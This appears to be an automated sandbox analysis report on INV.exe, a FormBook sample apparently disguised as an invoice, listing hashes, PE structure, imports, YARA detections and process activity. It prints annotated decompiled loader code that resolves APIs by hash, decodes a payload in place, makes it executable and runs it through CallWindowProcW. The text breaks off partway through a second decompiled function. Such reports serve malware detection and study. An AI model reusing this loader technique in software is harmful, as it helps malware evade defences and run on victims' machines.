                                      MD5:51279CD356C366D625D183A3DCB83674
                                      SHA1:931A15B368662F913082F6675C1E5E4F328C4924
                                      SHA-256:0716B41901C75AD657AE2BC6658506EF633A026CE2C0D547AC8A9218E6FC464A
                                      SHA-512:260521156C984B18DABFF4F9A993596F431BDA436BB50E987B755868BEE1B5113163E9BE06327D22CDAB3260359656F0F60C80999B5DE340A5C1D14F50CA4EA2
                                      Malicious:false
                                      Reputation:low
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER597C.tmp.WERInternalMetadata.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):8222
                                      Entropy (8bit):3.693586025165365
                                      Encrypted:false
                                      SSDEEP:192:Rrl7r3GLNi8v62X6YZH6tppgmfZ2SN+pr589bWW7wsfGSm:RrlsNiE6A6Yp6tppgmfZ2S/WYfa
                                      MD5:7FF269553DEC8C3DEAD9D42A93981584
                                      SHA1:36D14895C4F350E51AA8E7D8ADFB9D9F5B1D6CD1
                                      SHA-256:FFA7AD16F540827A13964F1FBF690B75D32B6519B24CACE7E73AB264C77691A7
                                      SHA-512:C6249B20B3821B02487999FF74C631E49547E1548F3498CFF666CE74C08A87BE4EE16150C6ABB3FDFADB738FCEC96C3086D6C10EA10E1C0C096D5BFF1CE5DFA6
                                      Malicious:false
                                      Reputation:low
                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.4.0.<./.P.i.d.>.......
                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B13.tmp.xml
                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):4533
                                      Entropy (8bit):4.453085391753248
                                      Encrypted:false
                                      SSDEEP:48:cvIwSD8zs8JgtWI98SWSC8Bq8fm8M4JA+ZFX+q8Hxq7zqvJuBd:uITf6bzSNlJnDII7mv4Bd
                                      MD5:621C78EE612AFF1724CCA4B31846DCB9
                                      SHA1:3FC8DE4A557EF3759869FE51F5D9E36BFD6F2679
                                      SHA-256:C36F1AFCB9B5FA8B1E9CBA499B001AE3352C7242E6D9E3574B4785A218911D08
                                      SHA-512:C578049B7162B750EFB0BED6451DF9DB3024917A10ABA87616E7B6EA975F7EBA1FDEFCBA6FF86AC8AD4EDBEDFB213430FD22248076A4FAC866CCFBD5229F2A87
                                      Malicious:false
                                      Reputation:low
                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="746544" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                      Static File Info

                                      General

                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                      Entropy (8bit):7.734539190231703
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:INV.exe
                                      File size:394240
                                      MD5:83259cb82642666503278233421c306d
                                      SHA1:180e81bab341eda0d404b8f5fed93bc3b350cfbd
                                      SHA256:6e28207e7a3ef7f173d7a7905208a55ff0ad1eb645241e2e9ae453c643cf3a31
                                      SHA512:c5b2342cdd849a49b4e2472c563301aa3f69d192317901f13dd94db5ad680db7b6e529a6b23fd2528e6378a08f058ee06a9663c8539ce44655235fd241cdc5c7
                                      SSDEEP:6144:OKRY0sMhL5VwjYGFzVfPn1IqXJ7kELwepHTAXF3QOrIxc8V4rJH:OKBsM1whBPn1IWdkELLpHU1Xrmc8V4
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0Y.ecY.ecY.ec...c@.ec...cV.ec...c<.ec.S.cT.ecY.dc3.ecT..cX.ecT..cX.ecY..cX.ecT..cX.ecRichY.ec........................PE..L..

                                      File Icon

                                      Icon Hash:00828e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x40127b
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows cui
                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                      DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0x5FC0322D [Thu Nov 26 22:54:37 2020 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:e5251995cfb2fe7a12656fff0fe17665

                                      Entrypoint Preview

                                      Instruction
                                      call 00007FAD40BC234Eh
                                      jmp 00007FAD40BC0D8Ah
                                      push ebp
                                      mov ebp, esp
                                      mov eax, dword ptr [ebp+08h]
                                      mov eax, dword ptr [eax]
                                      cmp dword ptr [eax], E06D7363h
                                      jne 00007FAD40BC0F77h
                                      cmp dword ptr [eax+10h], 03h
                                      jne 00007FAD40BC0F71h
                                      mov eax, dword ptr [eax+14h]
                                      cmp eax, 19930520h
                                      je 00007FAD40BC0F6Dh
                                      cmp eax, 19930521h
                                      je 00007FAD40BC0F66h
                                      cmp eax, 19930522h
                                      je 00007FAD40BC0F5Fh
                                      cmp eax, 01994000h
                                      je 00007FAD40BC0F58h
                                      xor eax, eax
                                      pop ebp
                                      retn 0004h
                                      call 00007FAD40BC26ECh
                                      int3
                                      push 00401285h
                                      call 00007FAD40BC2D3Bh
                                      pop ecx
                                      xor eax, eax
                                      ret
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      call 00007FAD40BC128Eh
                                      mov esi, eax
                                      test esi, esi
                                      je 00007FAD40BC109Bh
                                      mov edx, dword ptr [esi+5Ch]
                                      mov ecx, edx
                                      push edi
                                      mov edi, dword ptr [ebp+08h]
                                      cmp dword ptr [ecx], edi
                                      je 00007FAD40BC0F5Fh
                                      add ecx, 0Ch
                                      lea eax, dword ptr [edx+00000090h]
                                      cmp ecx, eax
                                      jc 00007FAD40BC0F41h
                                      lea eax, dword ptr [edx+00000090h]
                                      cmp ecx, eax
                                      jnc 00007FAD40BC0F56h
                                      cmp dword ptr [ecx], edi
                                      je 00007FAD40BC0F54h
                                      xor ecx, ecx
                                      test ecx, ecx
                                      je 00007FAD40BC1066h
                                      mov edx, dword ptr [ecx+08h]
                                      test edx, edx
                                      je 00007FAD40BC105Bh
                                      cmp edx, 05h
                                      jne 00007FAD40BC0F5Eh
                                      and dword ptr [ecx+08h], 00000000h
                                      xor eax, eax
                                      inc eax
                                      jmp 00007FAD40BC104Bh
                                      cmp edx, 01h
                                      jne 00007FAD40BC0F5Ah
                                      or eax, FFFFFFFFh
                                      jmp 00007FAD40BC103Eh

                                      Rich Headers

                                      Programming Language:
                                      • [RES] VS2013 build 21005
                                      • [LNK] VS2013 build 21005

                                      Data Directories

                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1d124 | 0x8c | .rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x1e0 | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x63000 | 0x130c | .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1cc68 | 0x40 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x18000 | 0x1c0 | .rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                      Sections

                                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x1000 | 0x16e9f | 0x17000 | False | 0.517747961957 | data | 6.61669655756 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rdata | 0x18000 | 0x5bb4 | 0x5c00 | False | 0.373259171196 | data | 4.5684318813 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data | 0x1e000 | 0x43b44 | 0x41e00 | False | 0.988499911053 | DOS executable (block device driver\377\377\200) | 7.98533790258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                      .rsrc | 0x62000 | 0x1e0 | 0x200 | False | 0.52734375 | data | 4.70436301348 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc | 0x63000 | 0x130c | 0x1400 | False | 0.778515625 | data | 6.50096033347 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      Name | RVA | Size | Type | Language | Country
                                      RT_MANIFEST | 0x62060 | 0x17d | XML 1.0 document text | English | United States

                                      Imports

                                      DLL | Import
                                      KERNEL32.dll | EnumCalendarInfoExA, SetCalendarInfoW, VirtualProtect, CloseHandle, WriteConsoleW, SetFilePointerEx, SetStdHandle, GetConsoleMode, GetConsoleCP, FlushFileBuffers, lstrcpyA, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, HeapSize, GetStringTypeW, HeapReAlloc, HeapAlloc, WaitForSingleObjectEx, EnumCalendarInfoW, CreateDirectoryW, EnumSystemLocalesW, GlobalFix, OutputDebugStringW, RtlUnwind, LoadLibraryExW, FreeLibrary, GetCommandLineA, GetLastError, SetLastError, GetCurrentThread, GetCurrentThreadId, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, WideCharToMultiByte, GetProcessHeap, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, WriteFile, GetModuleFileNameW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, CreateEventW, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetTickCount, GetModuleHandleW, CreateSemaphoreW, EnterCriticalSection, LeaveCriticalSection, FatalAppExitA, HeapFree, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, IsDebuggerPresent, IsProcessorFeaturePresent, SetConsoleCtrlHandler, CreateFileW
                                      MPR.dll | WNetDisconnectDialog1W, WNetGetResourceParentW, WNetGetNetworkInformationW, WNetGetResourceInformationW, WNetAddConnection3A
                                      MSACM32.dll | acmFilterTagEnumA, acmDriverEnum, acmFormatChooseW, acmStreamMessage, acmFilterEnumA, acmFormatEnumW, acmDriverDetailsW, acmFormatSuggest
                                      loadperf.dll | LoadPerfCounterTextStringsW, UnloadPerfCounterTextStringsA, LoadPerfCounterTextStringsA
                                      GDI32.dll | UnrealizeObject, GetGlyphOutline, GetCharABCWidthsFloatW, GetNearestColor
                                      WINSPOOL.DRV | StartDocPrinterW, SetPortW, DEVICECAPABILITIES

                                      Possible Origin

                                      Language of compilation system | Country where language is spoken | Map
                                      English | United States |

                                      Network Behavior

                                      Network Port Distribution

                                      UDP Packets

                                      ICMP Packets

                                      Timestamp                             Source IP     Dest IP   Checksum  Code                Type
                                      Nov 27, 2020 02:13:27.290100098 CET   192.168.2.4   8.8.8.8   d078      (Port unreachable)  Destination Unreachable

                                      System Behavior

                                      General

                                      Start time: 02:13:24
                                      Start date: 27/11/2020
                                      Path: C:\Users\user\Desktop\INV.exe
                                      Wow64 process (32bit): true
                                      Commandline: 'C:\Users\user\Desktop\INV.exe'
                                      Imagebase: 0x90000
                                      File size: 394240 bytes
                                      MD5 hash: 83259CB82642666503278233421C306D
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation: low

                                      General

                                      Start time: 02:13:24
                                      Start date: 27/11/2020
                                      Path: C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit): false
                                      Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase: 0x7ff724c50000
                                      File size: 625664 bytes
                                      MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: C, C++ or other language
                                      Reputation: high

                                      General

                                      Start time: 02:13:25
                                      Start date: 27/11/2020
                                      Path: C:\Users\user\Desktop\INV.exe
                                      Wow64 process (32bit): true
                                      Commandline: C:\Users\user\Desktop\INV.exe
                                      Imagebase: 0x90000
                                      File size: 394240 bytes
                                      MD5 hash: 83259CB82642666503278233421C306D
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: .Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000003.645815699.0000000000D26000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.667791715.0000000003915000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation: low

                                      General

                                      Start time: 02:13:28
                                      Start date: 27/11/2020
                                      Path: C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit): true
                                      Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 872
                                      Imagebase: 0x390000
                                      File size: 434592 bytes
                                      MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
                                      Has elevated privileges: true
                                      Has administrator privileges: true
                                      Programmed in: .Net C# or VB.NET
                                      Reputation: high

                                      Disassembly

                                      Code Analysis

                                        Executed Functions

                                        C-Code - Quality: 38%
                                        			E000A7800(void* __ebx, void* __esi, void* __eflags) {
                                        				intOrPtr _v8;
                                        				char _v12;
                                        				long _v16;
                                        				char _v18;
                                        				short _v20;
                                        				intOrPtr _v24;
                                        				char _v28;
                                        				char _v30;
                                        				short _v32;
                                        				intOrPtr _v36;
                                        				char _v40;
                                        				void* __edi;
                                        				intOrPtr* _t40;
                                        				intOrPtr* _t43;
                                        				void* _t44;
                                        				intOrPtr* _t48;
                                        				void* _t49;
                                        				signed char _t50;
                                        				intOrPtr* _t56;
                                        				void* _t85;
                                        				void* _t87;
                                        
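                                        				// Stack strings assembled from little-endian constants:
                                        				// _v28.._v18 spell "User32.dll", _v40.._v30 spell "Rpcrt4.dll".
                                        				_v28 = 0x72657355; // "User"
                                        				_v24 = 0x642e3233; // "32.d"
                                        				_v20 = 0x6c6c; // "ll"
                                        				_v18 = 0; // NUL terminator
                                        				_v40 = 0x72637052; // "Rpcr"
                                        				_v36 = 0x642e3474; // "t4.d"
                                        				_v32 = 0x6c6c; // "ll"
                                        				_v30 = 0; // NUL terminator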
                                        				_t56 = E000A7950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8ca9ef6c);
                                        				_t12 =  &_v28; // 0x72657355
                                        				_v8 = E000A7950( *_t56(_t12, _t85, __esi, __ebx), 0xb4c47f55);
                                        				_t40 = E000A7950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x5790f301);
                                        				_t17 =  &_v28; // 0x72657355
                                        				_t43 = E000A7950( *_t56(_t17), 0xc7e6f44f);
                                        				_t44 =  *_t40(0); // executed
                                        				 *_t43(_t44);
                                        				_t18 =  &_v40; // 0x72637052
                                        				_t48 = E000A7950( *_t56(_t18), 0x958d1c17);
                                        				_t49 =  *_t48(2, 0, 1, 0,  &_v12); // executed
                                        				_t87 = 0;
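                                        				if(_t49 != 0 && _t49 == 0x57) { // 0x57 (87) = ERROR_INVALID_PARAMETER
                                        					_t50 = 0;
                                        					// In-place decode loop over the 0x1e05-byte buffer at 0xaf0d0.
                                        					do {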
                                        						_t20 = 0xaf0d0 + _t50; // 0x17e1e9
                                        						asm("rol dl, 0x2");
                                        						asm("ror dl, 0x3");
                                        						 *(0xaf0d0 + _t50) = (_t50 + _t50 - ((( ~( !( *_t20) ^ 0x00000097) - 0x00000027 ^ _t50) - _t50 ^ _t50) - 0x00000060 ^ _t50) ^ _t50) - 0x00000052 ^ _t50;
                                        						_t50 = _t50 + 1;
                                        					} while (_t50 < 0x1e05);
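                                        					// 0x40 = PAGE_EXECUTE_READWRITE: the decoded buffer becomes executable.
                                        					VirtualProtect(0xaf0d0, 0x1e05, 0x40,  &_v16); // executed
                                        					// The buffer address is passed as lpPrevWndFunc, so CallWindowProcW transfers execution to it.
                                        					CallWindowProcW(0xaf0d0, 0xb0ed8, 0, 0, 0);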
                                        					return E000A7D10(_t87);
                                        				}
                                        				return _t49;
                                        			}

                                        APIs
                                        • GetConsoleWindow.KERNELBASE(00000000), ref: 000A78A6
                                        • RpcMgmtEpEltInqBegin.RPCRT4(00000000,00000002,00000000,00000001,00000000,?), ref: 000A78CB
                                        • VirtualProtect.KERNELBASE(000AF0D0,00001E05,00000040,?), ref: 000A792C
                                        • CallWindowProcW.USER32(000AF0D0,000B0ED8,00000000,00000000,00000000), ref: 000A7942
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.646740081.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true
                                        • Associated: 00000000.00000002.646727734.0000000000090000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646793640.00000000000A8000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.646815454.00000000000AE000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.646836339.00000000000AF000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.646857656.00000000000B1000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.647051678.00000000000F2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: Window$BeginCallConsoleMgmtProcProtectVirtual
                                        • String ID: Rpcrt4.dllUser32.dll$User32.dll
                                        • API String ID: 546183053-2494872352
                                        • Opcode ID: 3df0d46d33faee90278da1c67bcf092c3b75d0b5e95befca04789dbe411d74e0
                                        • Instruction ID: c645febcc1c4fa339ab73d52abe98ee413c11a42876f0d5ad8ead3854cd73bf0
                                        • Opcode Fuzzy Hash: 3df0d46d33faee90278da1c67bcf092c3b75d0b5e95befca04789dbe411d74e0
                                        • Instruction Fuzzy Hash: C431B171A402059FDB01DBF8CC8AFEFB7E5EF4A710F1044A5E609AB2A2DA75D9088754
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E00091DCF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                        				signed int _t82;
                                        				signed int _t86;
                                        				long _t90;
                                        				void* _t91;
                                        				signed int _t94;
                                        				signed int _t98;
                                        				signed int _t99;
                                        				signed char _t103;
                                        				signed int _t105;
                                        				intOrPtr _t106;
                                        				intOrPtr* _t109;
                                        				signed char _t111;
                                        				long _t119;
                                        				intOrPtr _t129;
                                        				signed int _t133;
                                        				void* _t135;
                                        				signed int _t138;
                                        				void** _t139;
                                        				signed int _t141;
                                        				signed int _t142;
                                        				signed int _t143;
                                        				signed int _t147;
                                        				signed int _t149;
                                        				void* _t150;
                                        				signed int _t154;
                                        				void* _t155;
                                        				void* _t156;
                                        
                                        				_push(0x64);
                                        				_push(0xacd50);
                                        				E000927F0(__ebx, __edi, __esi);
                                        				E00093117(0xb);
                                        				 *((intOrPtr*)(_t155 - 4)) = 0;
                                        				_push(0x40);
                                        				_t141 = 0x20;
                                        				_push(_t141);
                                        				_t82 = E000932EE();
                                        				_t133 = _t82;
                                        				 *(_t155 - 0x24) = _t133;
                                        				if(_t133 != 0) {
                                        					 *0xefd20 = _t82;
                                        					 *0xf1b28 = _t141;
                                        					while(1) {
                                        						__eflags = _t133 - 0x800 + _t82;
                                        						if(_t133 >= 0x800 + _t82) {
                                        							break;
                                        						}
                                        						 *((short*)(_t133 + 4)) = 0xa00;
                                        						 *_t133 =  *_t133 | 0xffffffff;
                                        						 *((intOrPtr*)(_t133 + 8)) = 0;
                                        						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
                                        						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
                                        						 *((short*)(_t133 + 0x25)) = 0xa0a;
                                        						 *((intOrPtr*)(_t133 + 0x38)) = 0;
                                        						 *((char*)(_t133 + 0x34)) = 0;
                                        						_t133 = _t133 + 0x40;
                                        						 *(_t155 - 0x24) = _t133;
                                        						_t82 =  *0xefd20; // 0x7df458
                                        					}
                                        					GetStartupInfoW(_t155 - 0x74);
                                        					__eflags =  *((short*)(_t155 - 0x42));
                                        					if( *((short*)(_t155 - 0x42)) == 0) {
                                        						L27:
                                        						_t129 = 0xfffffffe;
                                        						L28:
                                        						_t142 = 0;
                                        						__eflags = 0;
                                        						while(1) {
                                        							 *(_t155 - 0x2c) = _t142;
                                        							__eflags = _t142 - 3;
                                        							if(_t142 >= 3) {
                                        								break;
                                        							}
                                        							_t147 = (_t142 << 6) +  *0xefd20;
                                        							 *(_t155 - 0x24) = _t147;
                                        							__eflags =  *_t147 - 0xffffffff;
                                        							if( *_t147 == 0xffffffff) {
                                        								L33:
                                        								 *(_t147 + 4) = 0x81;
                                        								__eflags = _t142;
                                        								if(_t142 != 0) {
                                        									_t65 = _t142 - 1; // -1
                                        									asm("sbb eax, eax");
                                        									_t90 =  ~_t65 + 0xfffffff5;
                                        									__eflags = _t90;
                                        								} else {
                                        									_t90 = 0xfffffff6;
                                        								}
                                        								_t91 = GetStdHandle(_t90);
                                        								 *(_t155 - 0x1c) = _t91;
                                        								__eflags = _t91 - 0xffffffff;
                                        								if(_t91 == 0xffffffff) {
                                        									L45:
                                        									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
                                        									 *_t147 = _t129;
                                        									_t94 =  *0xf1a80; // 0x7e16f0
                                        									__eflags = _t94;
                                        									if(_t94 != 0) {
                                        										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
                                        									}
                                        									goto L47;
                                        								} else {
                                        									__eflags = _t91;
                                        									if(_t91 == 0) {
                                        										goto L45;
                                        									}
                                        									_t98 = GetFileType(_t91); // executed
                                        									__eflags = _t98;
                                        									if(_t98 == 0) {
                                        										goto L45;
                                        									}
                                        									 *_t147 =  *(_t155 - 0x1c);
                                        									_t99 = _t98 & 0x000000ff;
                                        									__eflags = _t99 - 2;
                                        									if(_t99 != 2) {
                                        										__eflags = _t99 - 3;
                                        										if(_t99 != 3) {
                                        											L44:
                                        											_t71 = _t147 + 0xc; // -982292
                                        											E00092D36(_t71, 0xfa0, 0);
                                        											_t156 = _t156 + 0xc;
                                        											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
                                        											L47:
                                        											_t142 = _t142 + 1;
                                        											continue;
                                        										}
                                        										_t103 =  *(_t147 + 4) | 0x00000008;
                                        										__eflags = _t103;
                                        										L43:
                                        										 *(_t147 + 4) = _t103;
                                        										goto L44;
                                        									}
                                        									_t103 =  *(_t147 + 4) | 0x00000040;
                                        									goto L43;
                                        								}
                                        							}
                                        							__eflags =  *_t147 - _t129;
                                        							if( *_t147 == _t129) {
                                        								goto L33;
                                        							}
                                        							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
                                        							goto L47;
                                        						}
                                        						 *((intOrPtr*)(_t155 - 4)) = _t129;
                                        						E0009207A();
                                        						_t86 = 0;
                                        						__eflags = 0;
                                        						L49:
                                        						return E00092835(_t86);
                                        					}
                                        					_t105 =  *(_t155 - 0x40);
                                        					__eflags = _t105;
                                        					if(_t105 == 0) {
                                        						goto L27;
                                        					}
                                        					_t135 =  *_t105;
                                        					 *(_t155 - 0x1c) = _t135;
                                        					_t106 = _t105 + 4;
                                        					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
                                        					 *(_t155 - 0x20) = _t106 + _t135;
                                        					__eflags = _t135 - 0x800;
                                        					if(_t135 >= 0x800) {
                                        						_t135 = 0x800;
                                        						 *(_t155 - 0x1c) = 0x800;
                                        					}
                                        					_t149 = 1;
                                        					__eflags = 1;
                                        					 *(_t155 - 0x30) = 1;
                                        					while(1) {
                                        						__eflags =  *0xf1b28 - _t135; // 0x20
                                        						if(__eflags >= 0) {
                                        							break;
                                        						}
                                        						_t138 = E000932EE(_t141, 0x40);
                                        						 *(_t155 - 0x24) = _t138;
                                        						__eflags = _t138;
                                        						if(_t138 != 0) {
